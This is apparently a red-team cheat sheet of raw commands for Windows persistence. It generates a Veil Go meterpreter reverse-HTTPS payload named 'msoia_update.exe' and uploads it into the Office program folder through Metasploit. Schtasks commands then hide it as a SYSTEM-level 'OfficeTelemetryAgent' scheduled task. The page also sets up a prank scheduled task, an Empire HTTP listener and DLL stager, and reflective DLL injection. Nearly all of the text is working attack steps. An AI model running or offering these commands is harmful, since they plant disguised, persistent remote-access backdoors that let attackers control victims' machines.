https://www.offensive-security.com/metasploit-unleashed/persistent-netcat-backdoor/

[*] Executable written to: /usr/share/veil-output/compiled/msoia_update.exe

Language: Go

Payload: go/meterpreter/rev_https

Required Options: COMPILE_TO_EXE=Y LHOST=192.168.167.76 LPORT=8443

Payload File: /usr/share/veil-output/source/msoia_update.go

Handler File: /usr/share/veil-output/handlers/msoia_update_handler.rc

schtasks /query

schtasks /query /TN "\GoogleUpdateTaskMachineCore" /FO list /v

schtasks /query /TN "\Microsoft\Office\OfficeTelemetryAgentLogOn" /FO list /v

Office Tasks Examples

"\Microsoft\Office\OfficeTelemetryAgentLogOn"

"\Microsoft\Office\OfficeTelemetryAgentLogOn2016"

"\Microsoft\Office\OfficeTelemetryFallBack"

"\Microsoft\Office\OfficeTelemetryFallBack2016"

msfconsole -r /usr/share/veil-output/handlers/msoia_update_handler.rc

upload /usr/share/veil-output/compiled/msoia_update.exe C:\Program Files\Microsoft Office\Office15

dir C:\Program Files\Microsoft Office\Office15

schtasks /Create /SC DAILY /TN "\Microsoft\Office\OfficeTelemetryAgent" /TR "C:\Program Files\Microsoft Office\Office15\msoia_update.exe" /ST 09:00

schtasks /query /TN "\Microsoft\Office\OfficeTelemetryAgent" /FO list /v

echo Y | schtasks /Delete /TN "\“\Microsoft\Office\OfficeTelemetryAgent”" /F

Ricky-Rolly

schtasks /create /sc daily /st 08:00 /et 17:00 /k /rl highest /tr "C:\Program Files\Internet Explorer\iexplore.exe https://www.youtube.com/watch?v=oHg5SJYRHA0" /tn "Crush" /it /ru System /ri 59

schtasks /create /sc daily /st 07:00 /rl highest /tr "C:\Program Files\Microsoft Office\Office15\msoia_update.exe" /tn "\Microsoft\Office\OfficeTelemetryAgentUpdate" /it /ru System

schtasks /Run /TN "\Crush"

schtasks /create /sc daily /st 08:00 /et 17:00 /k /rl highest /tr "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe https://www.youtube.com/watch?v=oHg5SJYRHA0" /tn "Crush" /it /ru System /ri 59

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --new-window "https://www.youtube.com/watch?v=oHg5SJYRHA0"

PID: 3172 PPID: 964 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe

Empire > Listener

Listener > uselistener http

set Host http://YOURIP:8080

execute

Listener > usestager windows/dll http

Stager > execute

msf> post/windows/manage/reflective_dll_inject

msf > set PATH /tmp/launcher.dll

results matching ""

    No results matching ""